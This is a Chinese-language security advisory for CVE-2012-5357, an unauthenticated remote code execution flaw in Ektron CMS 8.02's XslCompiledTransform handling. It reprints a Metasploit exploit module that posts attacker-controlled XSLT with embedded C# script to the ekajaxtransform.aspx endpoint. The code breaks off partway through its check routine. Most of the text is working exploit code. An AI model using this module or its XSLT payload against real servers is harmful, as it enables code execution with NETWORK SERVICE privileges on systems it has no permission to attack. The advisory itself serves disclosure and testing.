Ektron CMS 'XslCompiledTransform'类远程代码执行漏洞

发布日期：2012-12-05
更新日期：2012-12-07

受影响系统：
Ektron Ektron CMS 8.02
不受影响系统：
Ektron Ektron CMS 8.02 Service Pack 5
描述：
--------------------------------------------------------------------------------
BUGTRAQ  ID: 56816
CVE(CAN) ID: CVE-2012-5357

Ektron CMS是企业级Web内容管理系统。

Ektron CMS 8.02 Service Pack 5之前版本的XslCompiledTransform类在处理用户提交的XSL数据时存在安全漏洞，如果使用XslCompiledTransform类时启用了enablescript设置，攻击者通过构造POST数据，无需身份验证就能以NETWORK SERVICE权限执行任意代码。

<*来源：Richard Lundeen
 
  链接：
       
       
*>

测试方法：
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# 
##

require 'msf/core'
require 'msf/core/exploit/file_dropper'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

def initialize(info = {})
    super(update_info(info,
      'Name'          => 'Ektron 8.02 XSLT Transform Remote Code Execution',
      'Description'    => %q{
          This module exploits a vulnerability in Ektron CMS 8.02 (before SP5). The
        vulnerability exists due to the insecure usage of XslCompiledTransform, using a
        XSLT controlled by the user. The module has been tested successfully on Ektron CMS
        8.02 over Windows 2003 SP2, which allows to execute arbitrary code with NETWORK
        SERVICE privileges.
      },
      'Author'        => [
        'Unknown', # Vulnerability discovery, maybe Richard Lundeen from ?
        'juan vazquez' # Metasploit module
      ],
      'License'        => MSF_LICENSE,
      'References'    =>
        [
          [ 'CVE', '2012-5357'],
          [ 'URL', 'http://webstersprodigy.net/2012/10/25/cve-2012-5357cve-1012-5358-cool-ektron-xslt-rce-bugs/' ],
          [ 'URL', 'http://technet.microsoft.com/en-us/security/msvr/msvr12-016' ]
        ],
      'Payload'        =>
        {
          'Space'          => 2048,
          'StackAdjustment' => -3500
        },
      'Platform'      => 'win',
      'Privileged'    => true,
      'Targets'        =>
        [
          ['Windows 2003 SP2 / Ektron CMS400 8.02', { }],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Oct 16 2012'
    ))

register_options(
      [
        OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the VBS payload request', 60]),
        OptString.new('TARGETURI', [true, 'The URI path of the Ektron CMS', '/cms400min/'])
      ], self.class )
  end

def check

fingerprint = rand_text_alpha(5 + rand(5))
    xslt_data = <<-XSLT
<?xml version='1.0'?>
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:msxsl="urn:schemas-microsoft-com:xslt"
xmlns:user="http://mycompany.com/mynamespace">
<msxsl:script language="C#" implements-prefix="user">
<![CDATA[
public string xml()
{
return "#{fingerprint}";
}
]]>
</msxsl:script>
<xsl:template match="/">
<xsl:value-of select="user:xml()"/>
</xsl:template>
</xsl:stylesheet>
    XSLT

res = send_request_cgi(
      {
        'uri'    => "#{uri_path}WorkArea/ContentDesigner/ekajaxtransform.aspx",
        'version' => '1.1',
        'method'  => 'POST',
        'ctype'  => "application/x-www-form-urlencoded; charset=UTF-8",
        'headers' => {
          "Referer" => build_referer
        },
        'vars_post'    => {
          "xml" => rand_text_alpha(5 + rand(5)),
          "xslt" => xslt_data
        }
      })